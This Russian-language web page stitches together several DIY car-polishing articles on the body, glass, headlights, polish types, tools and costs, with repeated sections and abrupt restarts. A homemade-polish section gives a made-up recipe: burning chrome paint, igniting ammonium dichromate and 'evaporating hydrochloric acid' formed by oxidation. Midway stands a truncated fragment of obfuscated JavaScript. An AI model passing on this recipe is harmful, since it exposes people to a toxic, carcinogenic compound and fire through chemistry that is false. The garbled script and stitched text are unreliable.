Как сделать полировку машины в домашних условиях. Правильная полировка автомобиля. Полировка машины своими руками в домашних условиях

Для чего нужна полировка машины? Прежде всего она необходима для того, чтобы авто как можно дольше сохраняло свой первоначальный внешний вид. Кроме того, полировочный слой защищает поверхность машины от разрушительного воздействия влаги. Именно поэтому полировка крайне важна для любого автомобиля! В данной статье мы расскажем Вам о том, какой бывает полировка, как часто необходимо ее делать и как отполировать машину самостоятельно. Полировка автомобиля своими руками поможет Вам существенно сэкономить на уходе за авто, а также гарантирует Вам отличный результат.

Полировка автомобиля

Полировка автомобиля» может использоваться в разных целях, в зависимости от которых она подразделяется на 2 типа:

  1. защитная полировка кузова автомобиля, стекол и фар – ее нужно производить 2 раза в год (перед зимним сезоном и с наступлением весны). Задача такого вида полировки – защитить лакокрасочное покрытие авто от агрессивной внешней среды (снега, дождей, ветра, попадания на поверхность машины кусочков битума, асфальта, насекомых и т.п.). Суть процедуры сводится к тому, что вся поверхность машины обрабатывается неабразивными веществами, которые «впитываются» в имеющийся слой лака и краски;
  2. абразивная полировка кузова, стекол и фар автомобиля – ее проводят только в случае наличия серьезных недостатков покрытия машины (глубоких трещин, царапин, которые цепляются, если провести поперек них ногтем, небольших сколов и других дефектов). Задача такого вида полировки – восстановить внешний вид автомобиля. Ее суть заключается в том, что при помощи высокоабразивных материалов (паст, жидкостей, аэрозолей, наждачной бумаги и специальных шлифовальных дисков) «счищается» поврежденный слой поверхности, а на его место наносится новый слой полироли, которая восстанавливает поверхность.

Еще стоит отметить, что все вещества для полировки автомобилей различаются по форме выпуска и по своему составу. В зависимости от формы выпуска они бывают в виде:

  • густых паст – самые эффективные в работе,
  • жидкостей – менее эффективны, чем густые пасты, а еще неудобны в работе с вертикальными поверхностями,
  • аэрозолей – наименее эффективный, но в то же время самый дешевый вариант восстановителей, дающий лишь косметический эффект.

Что касается состава всей «автохимии», то ее делают либо на основе воска (животного или растительного происхождения), либо на полимерной основе. При этом полимерные средства более предпочтительны, поскольку они хоть и недешевые, но более долговечные и качественные. Самые надежные фирмы-производители «автохимии» - «ЗМ», «R-M», «Meguiars», «SIA, «Sonax», «Wurth».

Полировка кузова автомобиля своими руками

Теперь пришло время поговорить о том, как осуществляется полировка кузова автомобиля своими руками. Сразу оговоримся: процесс этот трудоемкий, требующий внимательности и терпения. Прежде всего, позаботьтесь о том, чтобы выполнять полировку в подходящих условиях – идеально, если это будет гараж или любое другое помещение, исключающее попадание солнечных лучей на поверхность авто. Выберите не очень жаркий день, поскольку в жару из полироли быстро улетучится эфир и растворитель, в результате чего она быстро подсыхает, усложняя работу. Проследите, чтобы в помещении было очень чисто – любое попадание песка или пыли в процессе полировки сыграет с Вами злую шутку.

Весь процесс полировки можно условно подразделить на этапы.

Этап №1 – подготовительный. Вначале авто нужно помыть и высушить, удалив битум, остатки насекомых и растений специальными моющими средствами.

Этап №2 – обезжиривание поверхности. Это нужно для того чтобы обеспечить лучшее сцепление полироли и лака. Обезжиривать поверхность нужно по частям, используя для этого специальные средства глубокой очистки и мягкие фланелевые тряпки.

Этап №3 – собственно полировка. Ее можно также подразделить на 2 этапа в зависимости от сложности повреждений. Если поверхность сильно повреждена, тогда в первую очередь ее нужно будет обработать густым средством с низкой абразивностью (600 или 1000). Если Вы полируете автомобиль вручную, тогда встряхните тубу со средством и прямо из флакона нанесите вещество на участок поверхности 50х50 см, дайте ему подсохнуть в течение 2-х минут и круговыми движениями сотрите средство с поверхности при помощи специальных полировочных салфеток. Сэкономить время и силы может специальная машинка для полировки автомобиля с 1500-4000 оборотами в минуту, представляющая собой ручную дрель со шлифовальным диском, на который закрепляются специальные шлифовальные поверхности при помощи липучек.

Когда шлифовка абразивами закончена, приходит время для безабразивных средств, которые наносятся и располировываются аналогично абразивным, но на меньших оборотах (1000-1500 оборотов в минуту). Здорово, если завершающим этапом работы станет нанесение защитного полировщика на скорости 3000-4000 оборотов в минуту. Он закрепит основную полироль, продлив срок ее службы.

Теперь остается лишь проверить качество работы: облейте машину водой. Если она собирается на поверхности крупными каплями, а не просто стекает вниз, значит, все хорошо! После полировки оставьте машину «отдохнуть» в течение 24 часов, и можно ездить!

Полировка стекол автомобиля

Второй по значимости процедурой является полировка стекол автомобиля. Конечно, когда стекла замутняются, осложняя обзор дороги, проще всего купить и вставить новые, но это дорого. Более экономичной является полировка стекла автомобиля от царапин. В этом подразделе мы расскажем Вам о том, как отполировать автомобиль при незначительных повреждениях.

Вначале мы моем машину, в особенности стекла. Затем все повреждения изнутри обводим маркером, чтобы в работе не потерять их из виду. Теперь закрываем машину пленкой, прорезая ее в тех местах, с которыми будем работать. Пленку закрепляем малярным скотчем, чтобы защитить поверхности от брызг и попадания полироли.

Теперь начинаем непосредственную работу со стеклами. Места повреждений моем специальными очистителями для стекол. Пока стекла высыхают, готовим полировочный состав, разводя полировальный порошок водой. В результате у нас получается кремообразная субстанция. Еще нам нужен пульверизатор с чистой водой. Наносим полироль на фетровый диск на дрели и растираем ее по стеклу. Затем подключаем полировщик и медленными движениями обрабатываем поверхности на скорости 1500-1700 оборотов в минуту, периодически сбрызгивая стекло водой из пульверизатора. В конце полировки протираем стекла бумажными салфетками и проверяем их на свет.

Полировка фар своими руками

Полировка фар своими руками, так же как и полировка стекол, поможет решить вопрос улучшения видимости на дороге. Если Вы обнаружили, что фары хуже освещают дорогу, не спешите менять лампы. Возможно, простая полировка фар своими руками в домашних условиях решит проблему. По своей сути полировка фар схожа с полировкой стекол. Чтобы убрать небольшие царапины и трещинки на фарах, необходимо снять поверхностный защитный слой пластика и заполнить эти дефекты специальными полировочными средствами. Естественно, что после полировки нужно покрыть фары прозрачным акрилом, который будет выполнять защитную функцию стекол фар.

Полировку фары мы начинаем с защиты кузова автомобиля при помощи пленки и малярного скотча. После этого мы очищаем фары при помощи специальных средств или раствора уксуса, а затем насухо протираем их тряпкой. Если фара требует полировки изнутри, тогда мы снимаем ее с автомобиля. Во всех остальных случаях полируем прямо на месте.

Аналогично полировке кузова и стекол вначале обрабатываем поверхности абразивами с зернистостью 1000 или 1500 при помощи полировочной машинки и фетровых дисков.

Затем поочередно наносим на фары средства с абразивностью 2000 и 2500. Это нужно для того чтобы убрать последствия от предыдущего средства. Периодически в процессе обработки поливаем фару водой, чтобы смыть частички пластика и абразивов. В результате работы у нас получается матовая поверхность, на которую мы наносим пасты для полировки автомобиля разной абразивности. После этих средств наносим на поверхность фары полировщик и растираем его на 1200-1500 оборотах в минуту при помощи полировочной машинки. В конце мы растираем остатки полировщиков специальными бархатными или микрофибровыми салфетками и любуемся результатами работы!

Помогает решить несколько очень важных задач. Нанеся на поверхность авто полироль, вы одновременно обеспечите:

  • защиту воздействия внешних атмосферных влияний;
  • предохранение от разрушения кузова агрессивной средами;
  • профилактику коррозии;
  • долгое сохранение целостности лакокрасочного покрытия авто;
  • удаление царапин, сколов и микроповреждений;
  • предохранение покраски автомобиля от выгорания;
  • эффектный блеск.
Полировка кузова авто

Современная промышленность предлагает потребителям широкий выбор средств для полировки кузова автомобиля. Это полимерная полироль, автомобильный воск, жидкое стекло, а также разные другие варианты.

Однако некоторые владельцы авто не очень доверяют промышленным средствам, предпочитая готовить полироль и наносить его на поверхность кузова автомобиля в домашних условиях.


Восстановление лака на кузове

Как приготовить полироль для кузова автомобиля

Перед тем как браться за самостоятельное изготовление состава для полировки авто в домашних условиях, следует знать, что это средство в своём составе должно содержать абразив и связующую составляющую. В ее роли можно использовать жиры, воду или силикон.

Учтите, что жиры невозможно удалить при помощи воды - это нужно будет делать с помощью сухой ветоши. Итак, приступаем к приготовлению :

  1. Готовим абразив . Для этого изготавливаем мелкозернистый оксид хрома. Получаем его по такому алгоритму:
  • сжигаем хромо-содержащую краску на костре или при помощи паяльника;
  • берём заблаговременно приобретённый дихромат аммония и поджигаем. Ждём до тех пор, пока он не окислится;
  • выпариваем соляную кислоту, образовавшуюся в процессе окисления.

Полеруем кузов авто
  1. Готовим связующую составляющую:
  • 0,2 стеарина - его можно добыть методом варки хозяйственного мыла и последующим перемешиванием полученного вещества с уксусной кислотой;
  • 0,1 хозяйственного мыла;
  • 0,7 оксида хрома;
  • 3 капли керосина.

Все части смешиваем в нагретом состоянии. Здесь необходимо соблюдать большую осторожность - стеарин относится к легковоспламеняющимся веществам.

После всех вышеописанных операций полироль для кузова автомобиля готов - можете пользоваться.

Процесс полировки кузова автомобиля в домашних условиях

Перед тем как полировать ваше авто, необходимо тщательно его вымыть. Можете это сделать на мойке или самостоятельно. Главным условием является полное удаление грязи и пыли с вашего четырёхколёсного друга. После окончания мойки всю поверхность необходимо тщательно высушить. Далее - провести уайт-спиритом тщательное обезжиривание всей поверхности кузова автомобиля.

Удалить с машины весь жировой слой и мелкие пятна нужно для того, чтобы как можно лучше подготовить поверхность к нанесению полироли.

При помощи губки и машинки для полировки состав наносится на поверхность авто. При этом полировочная машинка должна работать на минимальных оборотах. Лучше всего обрабатывать машину по частям.


Полировка при помощи электроинструмента

После нанесения состава нужно дать 15 минут на впитывание, после чего выполнить полировку. Если обрабатывать всю машину целиком, вы не успеете её отполировать за короткое время. А через 15 минут состав начнет застывать, и не будет давать зеркального блеска, делая поверхность мутной.

Все сложные места лучше всего обрабатывать вручную - используя машинку, можно не рассчитать и повредить лакокрасочное покрытие. Чтобы этого не произошло, следует использовать войлок и микрофибру.

В качестве финишного средства можно нанести закрепитель — он придаст поверхности вашей машины мокрый блеск. Это будет завершающим аккордом в вашей работе.

После окончания осматриваем поверхность под разными углами на предмет разводов и следов полироля. Если всё в порядке, и вы удовлетворены осмотром, процесс можно считать завершённым.


Натираем авто микрофиброй

Заключение

Чтобы отполировать поверхность своей машины, можно обратиться в специальный сервис либо сделать это самостоятельно. Многие автолюбители не очень стремятся доверять свои машины чужим рукам. Поэтому со всеми этапами - от приготовления состава для полировки до, собственно, самого процесса полирования - они стараются справляться своими силами.

Существует множество рецептов, позволяющих приготовить полироль в домашних условиях. Каждый автолюбитель имеет свои заветные секреты, которые лучше других помогут защитить кузов машины от негативных внешних влияний.

Это может быть продиктовано не столько желанием избавить себя от ненужных финансовых расходов, сколько возможностью обеспечить максимально добросовестный подход к решению задачи.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

Статья о том, как правильно полировать автомобиль самостоятельно, на что обратить внимание при полировке, инструменты и материалы. В конце статьи - наглядное видео о полировке кузова машины!

Лакокрасочное покрытие автомобиля состоит из нескольких слоёв: фосфатной защитной плёнки, грунта и нескольких лакокрасочных слоёв. У нового автомобиля этот многослойный пирог имеет «поры» и дышит через них.

В результате эксплуатации, воздействия ультрафиолетовых лучей и перепадов температуры поверхность краски кузова покрывается маленькими трещинками, небольшими сколами, преимущественно незаметными невооружённому взгляду. Скапливающаяся со временем в микроповреждениях пыль и кусочки грязи ухудшают отражающую способность покрытия, и автомобиль теряет первоначальный блеск. Образование на поверхности краски более глубоких повреждений приводит к обнажению металла. А это может вызвать образование ржавчины – самого страшного недуга машины.

Правила проведения полировки


Чтобы при полировке своими руками получить удовлетворительный результат, нужно выполнить пять простых и доступных условий:
  • Поверхность, подлежащая полировке, должна быть абсолютно чистой, т.е. кузов машины нужно тщательно промыть. Специализированными средствами удаляют капли гудрона, следы насекомых.
  • Проводить полировку следует в чистом помещении. Необходимо предпринять все доступные меры для предупреждения проникновения в помещение частиц пыли.
  • Для сохранения здоровья место проведения полировки должно хорошо вентилироваться. Образующуюся в процессе работы пыль можно удалять пылесосом.
  • Желательно исключить попадание на обрабатываемые поверхности прямых солнечных лучей. Это усложнит работу, поскольку ускорит высыхание рабочего состава. С целью своевременного обнаружения недочётов рабочее место необходимо оборудовать несколькими источниками искусственного освещения. Располагать подсветку нужно равномерного, без значительных перепадов освещённости.
  • Перед тем как приступить к полировке, следует критически осмотреть поверхности. Обнаруженные глубокие сколы можно залепить специализированным скотчем, а вмятины потребуют выравнивания. Для глубокой полировки царапин и сколов используют специальный метод. Все пластиковые и резиновые детали по возможности демонтируют или заклеивают скотчем, а фары снимают или заклеивают. Маскирование деталей предупреждает их загрязнение и повреждение.

Этапы выполнения простой полировки


Если на поверхности нет выраженных и грубых дефектов, то можно использовать простую полировку. Для выполнения процедуры своими руками на салфетку из микрофибры наносят специальную полироль, затем её аккуратно и равномерно распределяют по всей обрабатываемой поверхности. Когда станет заметен белый налёт – полироль высохла, значит наступил момент окончательной полировки до блеска.

Не стоит доводить полироль до полного высыхания – сложнее будет добиться ровного слоя, и в целом это усложнит работу.


Как показывает практика, идеально ровную и блестящую поверхность можно получить, совершив 10-20 движений в пределах небольшой зоны. В инструкции к любой полироли производитель рекомендует проводить простую полировку каждые 4-6 недель.

Этапы проведения глубокой полировки


Используя глубокую полировку кузова авто, можно избавить поверхность машины от царапин. Для проведения операции потребуются специальные инструменты и материалы:
  • Мелкий (р2000) и очень мелкий (р2500) наждак;
  • Чистая вода;
  • Резиновый брусок.
Используя перечисленные материалы и инструменты, шлифуются все крупные царапины. К крупным царапинам относятся те, которые могут быть обнаружены подушечками пальцев. Как только царапина перестаёт восприниматься подушечкой пальца, её и область вокруг зашлифовывают мелкой наждачкой.

Чтобы повысить эластичность наждачной бумаги, её заранее на 15- 20 минут замачивают. Заранее следует позаботиться и о дополнительной ёмкости для промывания наждачной бумаги в процессе работы.


В результате манипуляций вся обрабатываемая зона должна стать однородной. Для получения более выраженного эффекта шлифуем крестообразными движениями. Бывает, что имеется большой участок с множеством повреждений - рекомендуется разбивать его на участки меньшего размера и шлифовать их друг за другом. Крышу можно разделить на 4 части, а капот - на две.

И ещё одно. Лучше оставить неглубокую царапину, которая будет не заметна на обновлённой зеркальной поверхности. Если переусердствовать и протереть лак до краски, то это может быть исправлена только полным перекрашиванием.

Улучшить сцепление полироли и лакокрасочного покрытия можно, обезжирив поверхность специальными средствами глубокой очистки. Подготовленную таким образом поверхность увлажняют и наносят полировальную пасту. Специальной машинкой для полировки поверхностей на малых оборотах распределяют пасту.

Постепенно скорость машинки можно увеличивать. Инструмент в ваших руках должен совершать плавные, неспешные движения, задерживаясь немного дольше в проблемных зонах для получения лучшего равномерного результата. Не переусердствуйте, машинка может перегреться, поэтому не стоит долго работать с одним участком.

Полировочный круг не должен полностью пересыхать – периодически увлажняйте его. Но в меру, паста не должна лететь во все стороны.

Трещины и царапины под ручками удаляем вручную. Вначале шкуркой р2000, а затем войлочным кругом с грубой пастой обрабатываем поверхность под ручками. Дополнительные меры обычно не требуются.

При восстановительной полировке удаляются мелкие поверхностные царапины – возвращается первоначальный внешний вид лакокрасочного покрытия. Начинается процесс удаления верхнего слоя эмали и лака. Освежённая поверхность полируется. Допустимо проведение не более 20 таких операций, поскольку далее лакокрасочное покрытие нарушается.

Для защиты кузова машины от воздействия атмосферных осадков и других погодных факторов, а также при подготовке к продаже, пользуются защитной полировкой. При этом обработке подвергается весь кузов. От погодных факторов защищают силикон-содержашими препаратами. Для защиты неповреждённого лакокрасочного покрытия старых авто используют мягкую защитную полировку.

Качественные защитные полироли сохраняются на поверхности до 5-6 месяцев в зависимости от особенностей эксплуатации и хранения, частоты моек. Рекомендованная частота – 2 раза в год. Проводят процедуры в комплексе работ по подготовке автомобиля к летнему и зимнему сезонам.

Качественно выполненным полированием автовладелец отодвигает момент комплексной покраски. Кроме того, хорошо сделанная работа подарят покрытию машины новую яркую жизнь. Вы сможете гордиться, что самостоятельно получили великолепный результат и сэкономили бюджет.

Материалы для полировки, инструменты и оборудование


Для проведения качественной полировки и шлифовки необходимо наличие материалов соответствующего уровня:
  • Желательно профессиональная полировальная машинка;
  • Комплект разных по жёсткости полировальных кругов (оранжевые лучше не использовать);
  • Салфетки из микрофибры или хлопчатобумажная ветошь;
  • Качественная полироль;
  • Уайт-спирит.
Наиболее важно правильно выбрать шлифовальную машинку. Скорость движения пустых рук недостаточно большая, поэтому выбираем машинку со скоростью от 1 до 3 тысяч оборотов в минуту. Предпочтение стоит отдать проводной модели, поскольку аккумуляторные варианты отличаются коротким рабочим циклом с необходимостью подзарядки. Машинка может комплектоваться полировальными и шлифовальными кругами. Можно попробовать обойтись электродрелью - в этом случае потребуется приобрести круги для шлифовки и полировки, а также переходники к ним.

Из всего набора инструментов полировочный круг самый простой. Выпускают два их вида: войлочные и поролоновые. Оба вида различаются по уровню жёсткости – она должна соответствовать жёсткости используемой пасты. Жёсткость круга легче всего определить по цвету:

  • Самые жёсткие – белые (жёсткая паста);
  • Самые мягкие – чёрные (мягкая паста);
  • Для всех видов паст подходят оранжевые круги.
Однозначного соответствия пасты и кругов нет, всё определяется состоянием лакокрасочного покрытия автомобиля, глубиной и выраженностью царапин и повреждений.

Выбираем полироль


Перед приобретением средства следует определить степень и глубину повреждения лакокрасочного покрытия. Это очень важный момент, и отнестись к нему нужно максимально внимательно.

По химическому составу полироли делятся на восковые (животного и растительного происхождения) и полимерные (синтетические). Силиконовые и восковые составы выдерживают максимум 2 мойки. Их использование даёт прекрасный, глубокий, но недолговечный эффект.

Полимерные покрытия выигрывают с запасом в вопросе долговечности, но стоят они дороже и работать с ними сложнее. Рекомендуем применять только качественные, проверенные полироли, обезжириватели и салфетки.

На рынке представлено большое количество различных полиролей. Всё разнообразие можно разделить на две группы:

  • Порошковые, действие которых обусловлено содержащимися в составе аброзивными веществами. Эта группа полиролей хорошо справляется с мелкими царапинами.
  • Гелеобразные – заполняющие трещины и формирующие на поверхности защитный слой. Производители обычно рекомендуют их использовать для полировки свежеокрашенных и новых автомобилей.
В России наибольшую популярность получили пастообразные полироли. Благодаря своей консистенции они удерживаются на вертикальных поверхностях, кузов автомашины им легко поддаётся обработке со всех сторон. Несмотря на несколько большую стоимость, их предпочитают покупать ещё и за свойство дополнительного насыщения цвета.

Жидкие полироли, в отличие от пастообразных, быстро стекают даже с наклоненных под малым под углом поверхностей. Удобнее всего ими полировать крышу и крышки багажника и капота.

Очевидное преимущество жидкой полироли – неспособность стереть лак до грунта, поэтому использовать их можно сколь угодно часто.

Полироли в виде аэрозолей удобно использовать, но вещества, обеспечивающие их летучесть, снижают содержание полировочного вещества.

Видео о полировке кузова автомобиля:

Каждый начинающий водитель думает о том, как правильно полировать свою машину машину.

В решении этого вопроса происходит выбор одного из двух вариантов действий — можно отдать свою «ласточку» профессионалам или полировать машину своими руками.

Полировка кузова авто своими руками – это процесс совсем не сложный, овладев им, вы сможете защитить свою машину от агрессивных воздействий среды, а, заодно, и продлить срок службы.

Вместе с тем, можно и сэкономить определенное количество финансовых средств (услуга эта нынче не дешевая)

Полировку кузова можно воспринимать как пару часов увлекательной работы, которой можно заняться в выходной день. К тому же, вы получите большое удовлетворение от блеска вашего авто по окончании процедуры.

Стоимость работ на СТО и в сервисах составляет примерно 1200 рублей. Стоит ли освоить такую нехитрую процедуру? Считайте сами. Не забывайте, что опыт приобретается на всю жизнь.

Различают 2 основных типа полировки кузова автомобиля:

  • защитная полировка автомобиля — для защиты покрытия автомобиля. Предназначена для свежеокрашенных и новых автомобилей.

    Условно можно говорить, что авто до 2 лет эксплуатации отличаются «свежей» краской, поэтому для них необходима защитная полировка;

  • полирование с целью восстановления — при помощи абразивных паст. Используется для, так сказать, «обветренных» авто, имеющих на поверхности большое количество мелких царапин, рисок, портящих внешний вид.

Необходимо отметить, что абразивная полировка кузова автомобиля производится всего пару раз за весь срок жизнь автомобиля, ведь с каждым разом некоторая часть лакокрасочного покрытия «погибает».

Восстановительная полировка – несколько более сложный процесс, он требует определенного опыта, специальных инструментов и больших затрат.

Лучше, в этом случае, обратиться к специалистам. Причем крайне внимательно подойти к подбору мастера. Обращайтесь лишь к тем, кто имеет определенный авторитет в этой области.

Однако, если у вас непреодолимое желание сделать все самому, почему бы не попробовать?

Структура лакокрасочного покрытия

Различают несколько слоев покрытия автомобиля: грунт, фосфатная защитная пленка (обеспечит химическую защиту), краска и лак.

Как и кожа обычного человека, лакокрасочное покрытие (нового автомобиля в том числе), имеет естественные поры. И даже такой с виду мощный «пирог» не может обеспечить полное перекрытие.

Кислотные осадки, реагенты, соль, вода постепенно просачиваются вглубь краски и начинает протекать неизбежный процесс реакции химических элементов.

Так возникает коррозия. Когда не предпринимаются дополнительные меры (защитная полировка), через некоторое время начинают виднеться первые «веснушки», значит, до первых пятен ржавчины недалеко.

Нужно сказать, что в городах данный процесс протекает значительно быстрее. Чтобы отсрочить это прямо таки убийственное дело, необходима дополнительная защита.

Принцип действия защитных полиролей заключается в заполнении микротрещин и пор покрытия авто, придании блеска и новизны краске.

Однако такой вид защиты со временем смывается

Высококачественные защитные полироли (делаются на полимерной основе) могут эффективно работать 6-7 месяцев зависимо от интенсивности эксплуатации, количества моек, условий хранения.

Наличие приятного блеска у покрытия, свидетельствует о качестве защитного покрытия. Если кузов сияет, то защита работает, отталкивая воду и отражая ультрафиолетовые лучи.

Ухаживать за «любимцем» важно с момента его приобретения, тогда и спустя пять лет он будет выглядеть как с конвейера.

Стандартный метод нанесения полироли

Прежде чем приступить к полировке автомобиля своими руками, машину нужно тщательно вымыть и просушить.

Удалите следы от насекомых и битумные пятна специальными средствами.

Для лучшего сцепления (адгезии) полироли с лаком, нужно обезжирить лакокрасочное покрытие. С этой целью лучше использовать особые средства для очистки (к прмиеру, фирмы Hi-Gear).

Эта процедура поможет окончательно ликвидировать следы насекомых, гудрона, остатки предыдущей полироли

Вы увидите, что и без нанесения нового слоя полироли, ваше авто будет выглядеть посвежевшим. Данный пункт крайне важен при полировке.

Обезжириванием поверхность

Хорошо потрясите вещество. Производить обезжиривание лучше мягкой фланелевой тряпкой, частями, к примеру, визуально разделив кузов на четыре части.

Аналогично следует выполнять и полировку машины.

Данный этап подготовки — залог качественной полировки

Процесс полирования

Хорошо встряхните перед использованием тубу с полиролью.

Наносить вещество нужно непосредственно из флакона.

Участки поверхности равны приблизительно 50х50 сантиметров.

Движения имеют вид небольших ленточек или точек.

Таким образом, с помощью небольшой парралоновой губки наносим жидкость равномерным слоем по поверхности.

Подождите некоторое время (немного — пару минут), так чтобы немного подсохла полироль, и специальными салфетками располируйте до получения блестящего эффекта.

Чем тщательнее это будет сделано, тем качественнее будет ваша защита. Помните, что вещество не должно окончательно высохнуть, а то слой будет неравномерным.

Пройдя один-два участка, вы сами сможете быстро определять количество наносимого состава (важно не переусердствовать), а также время выдержки.

Для располировки использовать лучше специальные полировочные салфетки. Их цена невысока, а польза заметная. Приобрести их каждый сможет в любом автомагазине.

На весь кузов потребуется не больше 5 салфеток, однако лучше приобрести с запасом. Так, небольшими участками, вы быстро обработаете всю поверхность авто.

Полная усадка защитного слоя происходит за сутки. Автомобиль можно эксплуатировать в это время, но лучше пару часов воздержаться от выездов.

Условия при проведении работ

Крайне важно, где и в каких условиях производиться полировка.

При холодной погоде – полироль долго не подсыхает, да и располировывается плохо

Допускать попадания песка и пыли на полировку нельзя. Можно наделать больших бед, после чего придется делать восстановительную полировку. В связи с этим, лучше работать в гараже.

Как определить, в какой момент защита перестает работать?

Любая полироль образует стойкую к влаге пленочку.

Чем меньше ее смачиваемоть, тем лучше она будет отталкивать воду и надежнее защитит автомобиль.

Узнать степень смачиваемости реально при мойке авто.

Если вода стекается в крупные капли, то защита работает. В противном случае, пора наносить полироль в очередной раз.

По своему составу полироль делится на восковую (животного или растительного происхождения) и синтетическую (полимерная). Восковые составы или с содержанием силикона могут выдержать 2-3 мойки.

Такие средства недорогие, дают неплохой, но кратковременный результат. Его чаще всего используются во время предпродажной подготовки автомобиля.

По долговечности оптимальной защитой бесспорно являются полимерные покрытия. Хотя они и дороже, а наносить их сложнее, но качество стоит этого.

Как видите, нанести полироль на свой автомобиль совсем несложно. В этом случае, вы сохраните свои деньги и будете уверены в качестве работы.

Теперь вы знаете как правильно полировать свой автомобиль без помощи профессионалов и можете сэкономить свои время и средства, не потеряв при этом в качестве полировки вашего автомобиля.

Необходимость в полировке автомобиля возникает в случаях, когда появились глубокие царапины или потерян былой блеск кузова. Исходя из этого, возникает вопрос о том, как правильно полировать машину, не пользуясь услугами профессиональных мастеров. Данную процедуру можно выполнить самостоятельно, имея нужное оборудование и большое количество времени.

Чем будет осуществляться полировка?

Традиционно для обработки кузова авто используются различные виды полиролей. Они представляют собой стойкие эмульсии или пастообразные вещества, которые наносятся на полируемую поверхность. Состав материала очень сложен: полироль состоит из совокупности эпоксидных смол и смесей, содержащих воск. В целом полировка кузова автомобиля представляет собой процедуру сглаживания царапин и мелких трещин. Фактически обрабатываемая поверхность покрывается защитным слоем, который препятствует прохождению грязи и пыли.

Основные виды полиролей

В зависимости от характера производимых работ, различают 2 вида полиролей: защитные и восстановительные. Первые используются в качестве предупредительного мероприятия по защите ЛКП от вредных воздействий окружающей среды. Восстановительные позволяют скрыть дефекты кузова (царапины, сколы, въевшиеся следы) и придать ему блеск. Чаще всего такой вид полиролей используется при предпродажной подготовке авто.

Помимо этого, выделяются восковые полироли. Основное их назначение - придание блеска выцветшему ЛКП. Абразивные полироли выполняют несколько функций: они способны защитить кузов от воздействия ультрафиолета и попадания грязи в местах скола на кузове, а также скрыть некоторые мелкие царапины, которые портят внешний вид. Нанести вещество на поверхность транспортного средства поможет полировочная машинка для авто. Однако перед работой нужно правильно выбрать подходящее средство.

Исходя из этого, если возникает вопрос о том, чем полировать царапины на машине, то ключевую роль играет выбор правильного полирольного состава. Лучшим производителем абразивных полиролей считается немецкая компания Koch Chemie. Ее продукция продается в форме пасты. Перед ее нанесением авто необходимо тщательно промыть. Полировка осуществляется в несколько этапов: сначала паста наносится на полируемую поверхность, затем с помощью сухой тряпки аккуратно распространяется по всему кузову. Важно помнить, что вещество достаточно быстро засыхает. Не рекомендуется оставлять большое количество пасты на ЛКП, т. к. это может привести к образованию пятен. Если такие дефекты все-таки появились, избавиться от них можно, протерев соответствующие места мокрой тряпкой.

Сами полируем машину: особенности шлифовки кузова

Если на кузове есть места, которые сильно пострадали от ультрафиолетового излучения или попадания едких веществ, то их следует отшлифовать. Выполнять эту процедуру необходимо с помощью наждачной бумаги и бруса. Каждое проблемное место следует обрабатывать с добавлением воды.

При условии, что повреждены крупные части кузова, их нужно разделить на небольшие зоны. Переходить к каждой последующей необходимо только в том случае, когда предыдущая область отшлифована до идеального состояния. Важно помнить, что полировка кузова автомобиля - трудоемкий процесс. Качество выполнения такой работы зависит от результатов шлифовальных и подготовительных этапов (мойки, чистки кузова, поиска царапин и сколов).

Инструменты для работы

Качество конечного результата зависит от тщательности проведения шлифовки кузова. Не последнюю роль играют и инструменты. Для упрощения работы понадобится полировочная машина для авто. Существует множество различных моделей. Оптимальным вариантом считается оборудование марки Makita. Если нет возможности приобрести специализированный аппарат, можно воспользоваться обычной дрелью. Однако необходимо помнить, что при её эксплуатации будет существенная отдача в руки. Это может нанести вред как самой дрели, так и ЛКП автомобиля.

Помимо этого, потребуется два полировочных круга: для грубой и тонкой обработки. Их можно найти в любом строительном или автомобильном магазине. Среди огромного многообразия выбора предпочтение следует отдавать шерстяным и поролоновым кругам. К тому же, потребуется полировочная паста. Выбор зависит от цели работы: просто обновить внешний вид кузова или скрыть дефекты и мелкие сколы. Для каждого типа существует специализированный вариант.

Порядок работы

На первом этапе необходимо нанести пасту на полировальный круг, предназначенный для грубой обработки. Пасту можно выдавливать прямо из тюбика. Количество вещества должно быть в пределах 10-20 грамм (это соответствует чайной ложке). Не включая машинку, следует распределить полироль по обрабатываемой поверхности. Исходя из того что наносится малое количество вещества, площадь кузова, подлежащая обработке, должна быть небольшой - 40 на 40 сантиметров.

Полировочная машинка для авто имеет несколько режимов работы. На первом этапе обработка осуществляется на самой низкой скорости. После распределения пасты по кузову можно включить второй режим.

Для того чтобы паста распределялась равномерно, полировочные работы следует осуществлять “крестом”: горизонтально, затем вертикально. Весь процесс осуществляется на самой маленькой скорости работы машинки. После всех мероприятий с помощью сухой салфетки необходимо удалить излишки полироля.

Второй этап - придание кузову блеска. На шлифовальную машинку надевается круг для тонкой обработки. Затем заранее купленный полироль, придающий блеск авто, выдавливается на сухую тряпку. Вещество распределяется вручную по всей рабочей поверхности кузова. Полировка кузова автомобиля на этом этапе осуществляется на средней скорости работы машинки. По ходу работы можно увеличивать обороты с целью равномерного распределения пасты.

Заключительный этап

После проведения всех этапов работ можно посмотреть на результат: полированная машина будет иметь яркий и насыщенный цвет, на кузове не будут видны сколы и царапины. Однако остается только один штрих - нанесение защитного полироля. Его основное предназначение заключается в создании пленки на поверхности ЛКП с целью предотвращения появления пятен и царапин в будущем. Наносить его необходимо с помощью шлифовальной машинки с кругом для легкой обработки. Важно следить за количеством пасты на обрабатываемой поверхности: при её уменьшении следует обновить количество полироля.

Сколько будет стоить процесс полировки?

Необходимо затратить огромное количество сил и времени, чтобы полировать машину. Цена или конечная стоимость всей работы вас приятно удивит. Для сравнения: если воспользоваться услугами автомобильных мастерских, оказывающих услуги по полировке авто, то ценник будет варьироваться от 5000 до 7000 рублей. Такие цены практически во всех центрах, поэтому искать вариант выгоднее не приходится.

Общая стоимость работы по самостоятельной полировке будет зависеть от наличия нужного оборудования. Если есть шлифовальная машинка, то нужно будет потратиться только на расходные материалы: шлифовальные круги (цена - от 30 до 70 рублей), необходимое количество полироля (цена - от 350 до 900 рублей). В общем счете на полную полировку и защиту кузова уйдет порядка 3000 рублей (при неэкономном расходе).

Как полировать машину пастой 3М?

Эта паста получила широкое применение благодаря простоте нанесения, работы с ней и хорошему конечному результату, получаемому после обработки кузова авто. Производителем полироля является американская компания, которая заслужила доверие на рынке автомобильных услуг, выпуская чистящие и химические составы для ухода за салоном.

